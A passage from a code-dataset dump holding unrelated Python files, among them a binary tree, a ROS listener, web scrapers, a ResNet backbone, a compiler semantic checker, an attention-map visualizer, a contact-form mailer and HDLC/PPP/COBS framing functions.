add_left(self, e, node = None):\n newest = self._Node(e)\n if node is None:\n self._root._left = newest\n newest._parent = self._root\n\n else:\n node._left = newest\n node._left._parent = node\n self._size += 1\n\n def add_right(self, e, node = None):\n newest = self._Node(e)\n if node is None:\n self._root._right = newest\n newest._parent = self._root\n else:\n node._right = newest\n node._right._parent = node\n self._size += 1\n\n def add_root(self, e):\n if self._root is not None:\n raise ValueError(\"Root already exist!\")\n self._root = self._Node(e)\n self._size = 1\n\n def add_node(self, e, node = None):\n if node is None:\n node = self._root\n\n if self._root == None:\n self.add_root(e)\n else:\n if e <= node._element:\n if node._left is None:\n self.add_left(e)\n else:\n self.add_left(e, node._left)\n else:\n if node._right is None:\n self.add_right(e)\n else:\n self.add_right(e, node)\n","sub_path":"Data Structures/Trees/binarytree.py","file_name":"binarytree.py","file_ext":"py","file_size_in_byte":1787,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"440842368","text":"#!/usr/bin/env python2\nimport math\n\nimport rospy\nfrom sensor_msgs.msg import JointState\nfrom std_msgs.msg import Header\nfrom mycobot_communication.msg import MycobotAngles\n\n\nclass Listener(object):\n def __init__(self):\n super(Listener, self).__init__()\n\n rospy.loginfo(\"start ...\")\n rospy.init_node(\"real_listener_1\", anonymous=True)\n # init publisher.\n self.pub = rospy.Publisher(\"joint_states\", JointState, queue_size=10)\n # init subscriber.\n self.sub = rospy.Subscriber(\"mycobot/angles_real\", MycobotAngles, self.callback)\n rospy.spin()\n\n def callback(self, data):\n \"\"\"`mycobot/angles_real` subscriber callback method.\n\n Args:\n data (MycobotAngles): callback argument.\n \"\"\"\n # ini publisher object.\n joint_state_send = JointState()\n joint_state_send.header = Header()\n\n joint_state_send.name = [\n \"arm1_joint\",\n \"arm2_joint\",\n \"arm3_joint\",\n \"arm4_joint\",\n \"arm5_joint\",\n \"arm6_joint\",\n ]\n joint_state_send.velocity = [0]\n joint_state_send.effort = []\n joint_state_send.header.stamp = rospy.Time.now()\n\n # process callback data.\n radians_list = [\n data.joint_1 * (math.pi / 180),\n data.joint_2 * (math.pi / 180),\n data.joint_3 * (math.pi / 180),\n data.joint_4 * (math.pi / 180),\n data.joint_5 * (math.pi / 180),\n data.joint_6 * (math.pi / 180),\n ]\n rospy.loginfo(\"res: {}\".format(radians_list))\n\n joint_state_send.position = radians_list\n self.pub.publish(joint_state_send)\n\n\nif __name__ == \"__main__\":\n try:\n Listener()\n except rospy.ROSInterruptException:\n pass\n","sub_path":"examples/mycobot_ros/mycobot_280/scripts/listen_real_of_topic.py","file_name":"listen_real_of_topic.py","file_ext":"py","file_size_in_byte":1811,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"104289067","text":"import urllib.request\nimport time\nfrom bs4 import BeautifulSoup as bs\n\nurl = \"https://news.naver.com/main/main.nhn?mode=LSD&mid=shm&sid1=105\"\n\nresponse = urllib.request.urlopen(url)\n\nsoup = bs(response, 'html.parser')\n\nresults = soup.select(\".cluster_body a\") # Find subject\n\nfor result in results:\n print('Subject : ',result.string)\n \n url_article = result.attrs[\"href\"] # Find URL \n \n response = urllib.request.urlopen(url_article)\n \n soup_article = bs(response, 'html.parser')\n\n content = 
soup_article.select_one('#articleBodyContents') # Find main content\n\n print('Content')\n\n output =\"\"\n\n for item in content.contents: # Contents attr for string in tag\n stripped = str(item).strip()\n\n if stripped == \"\" : \n continue\n if stripped[0] not in [\"<\", \"/\"]:\n output += stripped\n \n print(output.replace(\n '본문 내용TV플레이어',\n '')\n )\n\n\n time.sleep(1) # To sleep not to be banned from naver throw multiple requests in a short-time","sub_path":"scraping/naver_news.py","file_name":"naver_news.py","file_ext":"py","file_size_in_byte":1042,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"155916388","text":"from typing import Tuple\n\nimport torchvision\nfrom torch import nn\n\nimport backbone.base\n\n\nclass ResNet101(backbone.base.Base):\n\n def __init__(self, pretrained: bool):\n super().__init__(pretrained)\n\n def features(self) -> Tuple[nn.Module, nn.Module, int, int]:\n resnet101 = torchvision.models.resnet101(pretrained=self._pretrained)\n\n # list(resnet101.children()) consists of following modules\n # [0] = Conv2d, [1] = BatchNorm2d, [2] = ReLU,\n # [3] = MaxPool2d, [4] = Sequential(Bottleneck...),\n # [5] = Sequential(Bottleneck...),\n # [6] = Sequential(Bottleneck...),\n # [7] = Sequential(Bottleneck...),\n # [8] = AvgPool2d, [9] = Linear\n children = list(resnet101.children())\n features = children[:-3]\n num_features_out = 1024\n\n hidden = children[-3]\n num_hidden_out = 2048\n\n for parameters in [feature.parameters() for i, feature in enumerate(features) if i <= 4]:\n for parameter in parameters:\n parameter.requires_grad = False\n\n features = nn.Sequential(*features)\n \n #print(features)\n\n return features, hidden, num_features_out, num_hidden_out\n","sub_path":"image/faster-rcnn-okvqa/backbone/resnet101.py","file_name":"resnet101.py","file_ext":"py","file_size_in_byte":1221,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"93674901","text":"import re\nimport requests\nimport os\nimport urllib.parse\n\nheader = {'content-type': 'application/json',\n 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 '\n '(KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36'}\nurl = \"http://soso.huitu.com/Search/GetAllPicInfo?perPageSize=102&kw={word}&page={num}\"\nword = input(\"请输入关键字:\")\nword = urllib.parse.quote(word)\nurls = [str(url).format(word=word, num=x) for x in range(1, 2)]\ni = 1\npath = \"./表情/\"\nif not os.path.exists(path):\n os.mkdir(path)\nfor url in urls:\n # print(url)\n html = requests.get(url).text\n\n # print(html)\n r = re.compile(r'\"imgUrl\":\"(.*?)\"')\n u = re.findall(r, html)\n\n for s in u:\n htmls = requests.get(s)\n print(\"正在下载第%s张图片\" % i)\n with open(path + str(i) + \".jpg\", 'wb')as f:\n f.write(htmls.content)\n i = i + 1","sub_path":"图片爬取/汇图网爬虫.py","file_name":"汇图网爬虫.py","file_ext":"py","file_size_in_byte":924,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"38487741","text":"import csv\r\n\r\nlist_1 = []\r\nlist_2 = []\r\n\r\nwith open('bright_stars.csv', 'r') as f:\r\n data_read = csv.reader(f)\r\n for i in data_read:\r\n list_1.append(i)\r\n\r\nwith open('Clean_dwarf_stars.csv', 'r') as f:\r\n data_read = csv.reader(f)\r\n for i in data_read:\r\n list_2.append(i)\r\n\r\nheader1 = list_1[0]\r\nheader2 = list_2[0]\r\n\r\nplanet_data1 = list_1[1:]\r\nplanet_data2 = list_2[1:]\r\n\r\nheaders = header1+header2\r\n\r\nplanet_data = []\r\n\r\nfor 
index, row in enumerate(planet_data1):\r\n planet_data.append(planet_data1[index]+planet_data2[index])\r\n\r\nwith open('merged_data.csv', 'a+') as f:\r\n csv_writer = csv.writer(f)\r\n csv_writer.writerow(headers)\r\n csv_writer.writerows(planet_data)","sub_path":"Merging.py","file_name":"Merging.py","file_ext":"py","file_size_in_byte":704,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"45939937","text":"import unittest\n\nfrom table import PhoneBookTable\n\nclass PhoneBookTableTest(unittest.TestCase):\n def setUp(self):\n self.table = PhoneBookTable()\n\n def test_get_table(self):\n items = [\n { 'id': 1, 'name': 'Mike', 'phone': '567' },\n { 'id': 2, 'name': 'Bobby', 'phone': '890' }\n ]\n result = self.table.get_table(items)\n\n self.assertIsInstance(result, str)\n for item in items:\n self.assertIn(str(item['id']), result)\n self.assertIn(item['name'], result)\n self.assertIn(item['phone'], result)","sub_path":"python/phone-book/table/table_test.py","file_name":"table_test.py","file_ext":"py","file_size_in_byte":533,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"170152551","text":"from anytree import Node, RenderTree\nfrom anytree.exporter import DotExporter\n\nfrom yacc_tzora import arvore, tabela, tem_erro_yacc\nimport poda_arvore_tzora as poda\n\n\"\"\"\ntratar tipo indice vetor e intervalo\ntratar tipo coersao atribuição\ntratar função duplicada\narrumar atribuição por leia\n\"\"\"\n\n\n# =========================\n# === Variáveis Globais ===\n# =========================\n# Guarda mensagens da varredura\nlista_mensagens = []\n# Guarda escopo percorrido no momento\nescopo = \"global\"\n# Guarda 0 quando não há erros e -1 quando há erros\ntem_erros = [0]\n\n# ==========================\n# === Funções Auxiliares ===\n# ==========================\n# Retorna se x exite em alguma regra dada\ndef estaContido(regra, pos, x, opcao=None):\n\tfor i in tabela:\n\t\tif (i[0] == regra):\n\t\t\tif (opcao == None and i[pos] == x):\n\t\t\t\treturn True\n\t\t\t# Verifica a regra em um escopo específico\n\t\t\telif (opcao != None and i[pos] == x and (i[5] == opcao or i[5] == \"global\")):\n\t\t\t\treturn True\n\treturn False\n\n# Retorna a linha de x\ndef getLinha(regra, pos, x, opcao=None):\n\tfor i in range (len(tabela)):\n\t\tif (tabela[i][0] == regra):\n\t\t\tif (opcao == None and tabela[i][pos] == x):\n\t\t\t\treturn i\n\t\t\t# Devolve posição de x em um escopo específico\n\t\t\telif (opcao != None and tabela[i][pos] == x and (tabela[i][5] == opcao or tabela[i][5] == \"global\")):\n\t\t\t\treturn i\n\treturn -1\n\n# Retorna a linha de x, sem considerar a opção \"global\" para o escopo\ndef getLinhaEspecifico(regra, pos, x, opcao=None):\n\tfor i in range (len(tabela)):\n\t\tif (tabela[i][0] == regra):\n\t\t\tif (opcao == None and tabela[i][pos] == x):\n\t\t\t\treturn i\n\t\t\t# Devolve posição de x em um escopo específico\n\t\t\telif (opcao != None and tabela[i][pos] == x and (tabela[i][5] == opcao)):\n\t\t\t\treturn i\n\treturn -1\n\n\n# Retorna se x é parâmetro da função \"escopo\"\ndef serParametroDaFuncao(escopo, x):\n\tpos = getLinhaEspecifico(\"FUNCAO\", 1, escopo)\n\tlista_var = tabela[pos][8][1]\n\tfor i in range (1,len(lista_var)):\n\t\tif (x == lista_var[i]):\n\t\t\treturn True\n\treturn False\n\n\n# Verifica se a função Principal existe\ndef hasPrincipal():\n\thas = False\n\tfor i in tabela:\n\t\tif (\"principal\" in i):\n\t\t\thas = True\n\treturn has\n\n\n# 
====================================\n# === Funções de Análise Semantica ===\n# ====================================\n# Percorre árvore em profundidade\ndef percorreArvore(no_atual):\n\t#print(no_atual.name)\n\tglobal escopo\n\t# ------------------\n\t# --- Trata o nó ---\n\t# ------------------\n\n\t# Define escopo (ao entrar na função)\n\tif (\"declaracao_funcao/\" in no_atual.name):\n\t\tescopo = no_atual.children[1].children[0].valor[0]\n\n\t# Trata retorno da função\n\tif (\"retorna/\" in no_atual.name):\n\t\tif (not (no_atual.leaves[0].tipo[0] == \"numero\")):\n\t\t\tvar_retorno = no_atual.leaves[0].valor[0]\n\t\t\tpos_var_retorno = getLinhaEspecifico(\"VARIAVEL\", 1, var_retorno, opcao=escopo)\n\t\t\ttabela[pos_var_retorno][7] = 1 # Declara que a variável foi utilizada\n\t\t\tif ( (pos_var_retorno == -1) and (not serParametroDaFuncao(escopo, var_retorno)) ):\n\t\t\t\tmensagem = \"ERROR: variável \" + var_retorno + \" está sendo usada, mas não foi declarada em \" + escopo + \".\"\n\t\t\t\tlista_mensagens.append(mensagem)\n\t\t\t\tprint(mensagem)\n\t\t\t\treturn -1\n\t\t\telse:\n\t\t\t\tpos_escopo = getLinha(\"FUNCAO\", 1, escopo)\n\t\t\t\tif (tabela[pos_var_retorno][2] != tabela[pos_escopo][2]):\n\t\t\t\t\tmensagem = \"ERROR: variável de retorno da função \" + escopo + \" é do tipo \" + tabela[pos_var_retorno][2] + \", mas o tipo esperado é \" + tabela[pos_escopo][2] + \".\"\n\t\t\t\t\tlista_mensagens.append(mensagem)\n\t\t\t\t\tprint(mensagem)\n\t\t\t\t\treturn -1\n\t\n\t# Trata chamada função\n\tif (\"chamada_funcao/\" in no_atual.name):\n\t\tnome_func = no_atual.valor[0] #Nome função chamada\n\t\t# Encontra a definição da função chamada\n\t\tpos_definicao = getLinha(\"FUNCAO\", 1, nome_func)\n\t\tpos_escopo = getLinha(\"FUNCAO\", 1, escopo)\n\n\t\tif ( pos_definicao == -1):\n\t\t\tmensagem = \"ERROR: função \" + nome_func + \" chamada na função \" + escopo + \" não existe.\"\n\t\t\tlista_mensagens.append(mensagem)\n\t\t\tprint(mensagem)\n\t\t\treturn -1\n\t\telif ( (escopo == \"principal\") and (nome_func == \"principal\") ):\n\t\t\tmensagem = \"WARNING: chamada recursiva para a função principal.\"\n\t\t\tlista_mensagens.append(mensagem)\n\t\t\tprint(mensagem)\n\t\telif (nome_func == \"principal\"):\n\t\t\tmensagem = \"ERROR: chamada para a função principal não permitida.\"\n\t\t\tlista_mensagens.append(mensagem)\n\t\t\tprint(mensagem)\n\t\t\treturn -1\n\n\t\t# === Olha o tipo dos parâmetros das funções ===\n\t\t# Encontra as chamadas funções\n\t\testa_correto = False # Auxiliar para verificar se existe chamada compatível com os tipo da declaração da função\n\t\tfor j in range (1, len(tabela)):\n\t\t\t# tabela[pos_definicao] é a declaração da função, tabela[j] é a chamada da função\n\t\t\tif (tabela[j][0] == \"CHAMADA\" and tabela[j][1] == tabela[pos_definicao][1]):\n\n\t\t\t\t# ... Preenche tipo dos parâmetros das chamadas de função ...\n\t\t\t\t# ... 
* Passo necessário, pois na sintática não preenche tipo de parâmetros ...\n\t\t\t\tif ( (len(tabela[j][8][1]) > 1) and tabela[j][8][0][1] == \"\"): # Testa se os tipos estão vazios\n\t\t\t\t\tfor k in range (len(tabela[j][8][1])-1):\n\t\t\t\t\t\texiste_escopo_local = getLinhaEspecifico(\"VARIAVEL\", 1, tabela[j][8][1][k+1], opcao=tabela[pos_escopo][1]) # Testa se cada variável da chamada foi criada localmente\n\t\t\t\t\t\tif (existe_escopo_local != -1):\n\t\t\t\t\t\t\ttabela[j][8][0][k+1] = tabela[existe_escopo_local][2] # Atribui o tipo para o parâmetro\n\t\t\t\t\t\t\ttabela[existe_escopo_local][7] = 1 # Declara que a variável foi utilizada\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\texiste_escopo_global = getLinhaEspecifico(\"VARIAVEL\", 1, tabela[j][8][1][k+1], opcao=\"global\") # Testa se cada variável da chamada foi criada globalmente\n\t\t\t\t\t\t\tif (existe_escopo_global != -1):\n\t\t\t\t\t\t\t\ttabela[j][8][0][i+1] = tabela[existe_escopo_global][2] # Atribui o tipo para o parâmetro\n\t\t\t\t\t\t\t\ttabela[existe_escopo_global][7] = 1 # Declara que a variável foi utilizada\n\t\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t\tmensagem = \"ERROR: Variável \" + tabela[j][8][1][k+1] + \" passada como parâmetro da função \" + tabela[j][1] + \" chamada na função \" + escopo + \" não foi declarada.\"\n\t\t\t\t\t\t\t\tlista_mensagens.append(mensagem)\n\t\t\t\t\t\t\t\tprint(mensagem)\n\t\t\t\t\t\t\t\treturn -1\n\n\t\t\t\t# ... Preenchidos os tipo, verifica se estão corretos ...\n\t\t\t\tfor k in range (len(tabela[j][8][0])-1):\n\t\t\t\t\tif (tabela[j][8][0][k+1] != tabela[pos_definicao][8][0][k+1]) :\n\t\t\t\t\t\tmensagem = \"WARNING: Variável \" + tabela[j][8][1][k+1] + \" passada como parâmetro da função \" + tabela[j][1] + \" chamada na função \" + escopo + \" é do tipo \" + tabela[j][8][0][k+1] + \" e o tipo esperado é \" + tabela[pos_definicao][8][0][k+1] + \".\"\n\t\t\t\t\t\tlista_mensagens.append(mensagem)\n\t\t\t\t\t\tprint(mensagem)\n\n\t# Trata atribuições\n\tif (\"atribuicao/\" in no_atual.name):\n\t\tvar = no_atual.children[0].children[0].valor[0]\n\t\tif ( (not estaContido(\"VARIAVEL\", 1, var, escopo)) and (not serParametroDaFuncao(escopo, var))):\n\t\t\tmensagem = \"ERROR: variável \" + var + \" está sendo usada, mas não foi declarada em \" + escopo + \".\"\n\t\t\tlista_mensagens.append(mensagem)\n\t\t\tprint(mensagem)\n\t\t\treturn -1\n\t\telse: # Registra que a variável foi inicializada\n\t\t\tpos = getLinha(\"VARIAVEL\", 1, var, escopo)\n\t\t\ttabela[pos][6] = 1\n\n\t\t# Percorre fatores da atribuição\n\t\tfolhas = no_atual.children[1].leaves\n\t\tfor j in folhas:\n\t\t\tpos = getLinha(\"VARIAVEL\", 1, j.valor[0], escopo)\n\t\t\tif ( pos != -1):\n\t\t\t\ttabela[pos][7] = 1 # Registra que a variável foi utilizada\n\t\t\t\tif (tabela[pos][6] == 0):\n\t\t\t\t\tmensagem = \"ERROR: variável \" + j.valor[0] + \" está sendo usada, mas não foi inicializada.\"\n\t\t\t\t\tlista_mensagens.append(mensagem)\n\t\t\t\t\tprint(mensagem)\n\t\t\t\t\treturn -1\n\n\t# Percorre filhos\n\tfor i in no_atual.children:\n\t\thasError = percorreArvore(i)\n\t\tif (hasError == -1):\n\t\t\treturn -1\n\n\t# Defina escopo (ao sair da função)\n\tif (\"declaracao_funcao/\" in no_atual.name):\n\t\t#global escopo\n\t\tescopo = \"global\"\n\n\n\n# Faz varredura semântica\ndef varre_semantica():\n\tglobal lista_mensagens\n\tdeclaradas = [] # Armazena nome das variaveis declaradas\n\trepeticoes = [] # Armazena elementos repetidos, para a exclusão\n\t#print(tabela)\n\n\t# === Tem função principal ===\n\tif (not 
hasPrincipal()):\n\t\tmensagem = \"ERROR: Programa não tem função principal.\"\n\t\tlista_mensagens.append(mensagem)\n\t\tprint(mensagem)\n\t\treturn -1\n\n\t# Percorre tabela de símbolos\n\tfor i in range (len(tabela)):\n\n\t\t# === Verifica se uma variável foi declarada mais de uma vez ===\n\t\tif (tabela[i][0] == \"VARIAVEL\"):\n\t\t\tif (((tabela[i][1]+tabela[i][5]) in declaradas) or ((tabela[i][1]+\"global\") in declaradas)):\n\t\t\t\tmensagem = \"WARNING: Variável \" + tabela[i][1] + \" na linha \" + str(tabela[i][7]) + \" já foi declarada.\"\n\t\t\t\tlista_mensagens.append(mensagem)\n\t\t\t\tprint(mensagem)\n\t\t\t\trepeticoes.append(i)\n\t\t\telse:\n\t\t\t\tdeclaradas.append(tabela[i][1]+tabela[i][5])\n\n\t\t# === Olha quantidades de parâmetros das funções ===\n\t\t# Encontra as funções\n\t\tif (tabela[i][0] == \"FUNCAO\"):\n\n\t\t\t# Encontra as chamadas funções\n\t\t\tfor j in range (len(tabela)):\n\t\t\t\t# tabela[i] é a declaração da função, tabela[j] é a chamada da função\n\t\t\t\tif (tabela[j][0] == \"CHAMADA\" and tabela[j][1] == tabela[i][1]):\n\t\t\t\t\t# Compara se o num de parametros é o mesmo\n\t\t\t\t\tif (len(tabela[i][8][1]) != len(tabela[j][8][1])):\n\t\t\t\t\t\t\t\tmensagem = \"ERROR: A função \" + tabela[i][1] + \" deve ter \" + str(len(tabela[i][8][1]) - 1) + \" parâmetros e ela foi chamada com \" + str(len(tabela[j][8][1]) - 1) + \" parâmetros.\"\n\t\t\t\t\t\t\t\tlista_mensagens.append(mensagem)\n\t\t\t\t\t\t\t\tprint(mensagem)\n\t\t\t\t\t\t\t\treturn -1\n\n\t# === Remove repeticoes ===\n\tfor i in repeticoes:\n\t\ttabela.pop(i)\n\n\t# === Percorre Árvore ===\n\thasError = percorreArvore(arvore)\n\tif (hasError == -1):\n\t\treturn -1\n\n\t# === Verifica a inicialização e utilização das variáveis ===\n\tfor i in range (1, len(tabela)):\n\t\t# === Verifica se as variáveis foram inicializadas ===\n\t\tif (tabela[i][0] == \"VARIAVEL\" and tabela[i][6] == 0):\n\t\t\tmensagem = \"WARNING: Variável \" + tabela[i][1] + \" na linha \" + str(tabela[i][9]) + \" foi declarada mas não inicializada.\"\n\t\t\tlista_mensagens.append(mensagem)\n\t\t\tprint(mensagem)\n\n\t\t# === Verifica se as variáveis foram utilizadas ===\n\t\tif (tabela[i][0] == \"VARIAVEL\" and tabela[i][7] == 0):\n\t\t\tmensagem = \"WARNING: Variável \" + tabela[i][1] + \" na linha \" + str(tabela[i][9]) + \" foi declarada mas nunca utilizada.\"\n\t\t\tlista_mensagens.append(mensagem)\n\t\t\tprint(mensagem)\n\n\n\n\t#print(tabela)\n\n# Chama varedura\nif not tem_erro_yacc:\n\ttem_erros[0] = varre_semantica()\n\n# Poda árvore\npoda.poda_arvore(arvore)\n#DotExporter(arvore).to_dotfile(\"arvore_podada.dot\")\nDotExporter(arvore).to_picture(\"arvore_podada.png\")\n#print(\"Para ver a imagem do grafo em PNG rode \\\" dot -Tpng -O arvore_podada.dot \\\".\")\n\n\n","sub_path":"semantica.py","file_name":"semantica.py","file_ext":"py","file_size_in_byte":10683,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"180132082","text":"import torch\nimport random\nimport tifffile\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom Utils.Dataloader import Dataloader\nfrom Utils.Helpers import *\nfrom pathlib import Path\nfrom Utils.Metrics import *\n\n\n# Params:\nparams = dict(num_categories=2, pretrained_on=None, num_epochs=100,\n device=torch.device('cuda' if torch.cuda.is_available() else 'cpu'))\nmodel_path = Path('experiments/experiment_2/cbam_unet_32-512_wDeepSupervision_136.pt')\ndataloader_path = Path('tmp/Dataloader_SN1_Buildings.pkl')\nnum_image = 
207\nmode = 'test'\n\n# Visualize:\nrandom.seed(42)\nnp.random.seed(42)\ndataloader = Dataloader()\ndataloader.load(dataloader_path)\ndataloader.on_epoch_start(params)\ntry:\n model = torch.load(model_path)\nexcept RuntimeError as e:\n model = torch.load(model_path, map_location=lambda storage, loc: storage)\nmodel.eval()\nif mode == 'train':\n obj = dataloader.train_objs[num_image]\nelif mode == 'val':\n obj = dataloader.val_objs[num_image]\nelif mode == 'test':\n obj = dataloader.test_objs[num_image]\nX, Y = dataloader.get_mini_batch(num_image, params, mode=mode, data_augmentation=False, weight=False)\nout = model(X, save_attention=True)\n\n# spatial:\nfig = plt.figure(figsize=(20, 10), dpi=100)\ntensor_paths_spatial = [p for p in Path('tmp').iterdir() if 'cbam-attention_spatial_' in p.name]\ntensor_paths_spatial.sort(key=lambda p:torch.load(p).shape[-2], reverse=True)\nfor i, tensor_path in enumerate(tensor_paths_spatial):\n attention_map = torch.load(tensor_path).to('cpu').detach().numpy()\n _, _, h_att, w_att = attention_map.shape\n attention_map = attention_map.reshape((h_att, w_att))\n ax = fig.add_subplot(int(f'22{i + 1}'))\n ax.set_title(f'spatial attention map {i + 1}')\n assert np.max(attention_map) <= 1.0 and np.min(attention_map) >= 0.0\n # att = ax.imshow(attention_map, cmap='plasma', alpha=1.0, vmin=0.0, vmax=1.0)\n att = ax.imshow(attention_map, cmap='plasma', alpha=1.0, vmin=np.min(attention_map), vmax=np.max(attention_map))\n x0, y0, width, height = ax.get_position().bounds\n cbaxes = fig.add_axes([x0 + width + .01, y0, .01, height])\n cb = plt.colorbar(att, cax=cbaxes)\n ax.set_xticks([])\n ax.set_yticks([])\nplt.show()\n\n# channel:\nfig = plt.figure(figsize=(20, 10), dpi=100)\ntensor_paths_channel = [p for p in Path('tmp').iterdir() if 'cbam-attention_channel_' in p.name]\ntensor_paths_channel.sort(key=lambda p:torch.load(p).shape[1], reverse=False)\nbounds = []\nfor i, tensor_path in enumerate(tensor_paths_channel):\n attention_map = torch.load(tensor_path).to('cpu').detach().numpy()\n _, ch_att, _, _ = attention_map.shape\n attention_map = attention_map.reshape((1, ch_att))\n ax = fig.add_subplot(int(f'41{i + 1}'))\n bounds.append(ax.get_position().bounds)\n ax.set_title(f'channel attention map {i + 1}')\n assert np.max(attention_map) <= 1.0 and np.min(attention_map) >= 0.0\n # att = ax.imshow(attention_map, cmap='plasma', alpha=1.0, vmin=0.0, vmax=1.0)\n att = ax.imshow(attention_map, cmap='plasma', alpha=1.0, vmin=np.min(attention_map), vmax=np.max(attention_map))\n # ax.set_xticks([])\n ax.set_yticks([])\ncbaxes = fig.add_axes([bounds[-1][0] + bounds[-1][2] + .03, .25, .01, .5])\ncb = plt.colorbar(att, cax=cbaxes)\nplt.show()\nprint(str(model_path.absolute()))\n\n# clean up:\nfor tensor_path in tensor_paths_spatial + tensor_paths_channel:\n os.remove(str(tensor_path.absolute()))\n","sub_path":"visualize_cbam_spatial_and_channel.py","file_name":"visualize_cbam_spatial_and_channel.py","file_ext":"py","file_size_in_byte":3415,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"607716088","text":"class Solution:\n def removeElement(self, nums, val):\n \"\"\"\n :type nums: List[int]\n :type val: int\n :rtype: int\n \"\"\"\n \n pos = 0\n\n while pos < len(nums):\n num = nums[pos]\n if num == val:\n del nums[pos]\n pos+=1\n\n return 
len(nums)","sub_path":"leetcode/remove_ele.py","file_name":"remove_ele.py","file_ext":"py","file_size_in_byte":339,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"476716071","text":"from core.app import app\nfrom core.email import email\nfrom core.functions import functions\n\nfrom .base import base\n\nfrom email.utils import parseaddr\nimport urllib.request\nimport json\n\n\nclass enviar(base):\n def index(self):\n ret = {\n \"headers\": [(\"Content-Type\", \"application/json charset=utf-8\")],\n \"body\": \"\",\n }\n campos = app.post[\"campos\"]\n respuesta = {\"exito\": True, \"mensaje\": \"\"}\n nombre_sitio = app.title\n config = app.get_config()\n secret = config[\"google_captcha_secret\"]\n email_empresa = config[\"main_email\"]\n\n if campos[\"nombre\"] == \"\":\n respuesta[\"mensaje\"] += \"Error!  Nombre vacío.
\"\n\n if campos[\"email\"] == \"\":\n respuesta[\"mensaje\"] += \"Error!  Email vacío.
\"\n elif \"@\" not in parseaddr(campos[\"email\"])[1]:\n respuesta[\"mensaje\"] += \"Error!  Email no valido.
\"\n\n if campos[\"mensaje\"] == \"\":\n respuesta[\"mensaje\"] += \"Error!  Mensaje vacío.
\"\n\n if \"g-recaptcha-response\" not in campos or campos[\"g-recaptcha-response\"] == \"\":\n respuesta[\n \"mensaje\"\n ] += \"Error!  Error en captcha. Por favor completa el captcha.
\"\n respuesta[\"captcha\"] = True\n\n if respuesta[\"mensaje\"] != \"\":\n respuesta[\"exito\"] = False\n\n if respuesta[\"exito\"]:\n url = \"https://www.google.com/recaptcha/api/siteverify?secret={}&response={}&remoteip={}\"\n url = url.format(secret, campos[\"g-recaptcha-response\"], app.client_ip)\n\n file = urllib.request.urlopen(url)\n captcha = json.loads(file)\n respuesta[\"exito\"] = captcha[\"success\"]\n if not respuesta[\"exito\"]:\n respuesta[\n \"mensaje\"\n ] = \"Error!  Error en captcha. Por favor completa el captcha.\"\n\n respuesta[\"captcha\"] = True\n del campos[\"g-recaptcha-response\"]\n\n if respuesta[\"exito\"]:\n body_email = {\n \"template\": \"contacto\",\n \"titulo\": \"Formulario de \" + campos[\"titulo\"],\n \"cabecera\": \"Estimado {}, hemos recibido su correo, el cual será respondido a la brevedad por el centro de atención al cliente de {}\".format(\n campos[\"nombre\"], nombre_sitio\n ),\n }\n titulo = campos[\"titulo\"]\n body_email[\"campos_largos\"] = {\n \"Mensaje\": campos[\"mensaje\"].replace(\"\\n\", \"
\\n\")\n }\n del campos[\"accion\"]\n del campos[\"titulo\"]\n del campos[\"mensaje\"]\n body_email[\"campos\"] = campos\n imagenes = []\n\n adjuntos = []\n if \"file\" in app.post:\n for file in app.post[\"file\"]:\n adjuntos.append(\n {\"archivo\": file[\"tmp_name\"], \"nombre\": file[\"name\"]}\n )\n\n body = email.body_email(body_email)\n respuesta = email.enviar_email(\n [campos[\"email\"], email_empresa],\n \"Formulario de \" + titulo,\n body,\n adjuntos,\n imagenes,\n )\n\n if respuesta[\"exito\"]:\n respuesta[\n \"mensaje\"\n ] = \"Gracias!  Email enviado correctamente.\"\n respuesta[\"captcha\"] = True\n else:\n respuesta[\"mensaje\"] = (\n \"Error!  No se puede enviar el email, por favor intente más tarde.
\"\n + respuesta[\"mensaje\"]\n )\n respuesta[\"captcha\"] = True\n\n ret[\"body\"] = json.dumps(respuesta, ensure_ascii=False)\n return ret\n\n","sub_path":"app/controllers/front/themes/jycdesayunos/enviar.py","file_name":"enviar.py","file_ext":"py","file_size_in_byte":3957,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"269007693","text":"from bitstring import BitArray\n\ndef HDLC(input):\n oseq = BitArray('0x7e')\n bits_in_a_row = 0\n\n for bit in input:\n oseq.append('0b1' if bit else '0b0')\n\n if bit:\n bits_in_a_row += 1\n else:\n bits_in_a_row = 0\n\n if bits_in_a_row == 5:\n oseq.append('0b0')\n bits_in_a_row = 0\n\n oseq.append('0x7e')\n return oseq\n\ndef as_bytes(lst):\n i = iter(lst)\n while True:\n x = next(i)\n y = next(i)\n yield '0x' + x + y\n\ndef PPP(input):\n oseq = BitArray('0x7e')\n \n for byte in as_bytes(input.hex):\n if byte == '0x7e':\n oseq.append('0x7d, 0x5e')\n elif byte == '0x7d':\n oseq.append('0x7d, 0x5d')\n else:\n oseq.append(byte)\n\n oseq.append('0x7e')\n return oseq\n\ndef COBS(input):\n oseq = BitArray('0x00')\n\n def next_nonzero(input):\n nonzero = []\n count = 1\n for byte in as_bytes(input.hex):\n if byte == '0x00':\n yield '0x{:02x}'.format(count)\n count = 1\n else:\n count += 1\n yield '0x{:02x}'.format(count)\n\n gen = next_nonzero(input)\n\n oseq.append(next(gen))\n for byte in as_bytes(input.hex):\n if byte == '0x00':\n oseq.append(next(gen))\n else:\n oseq.append(byte)\n\n oseq.append('0x00')\n return oseq\n\nif __name__ == '__main__':\n test1 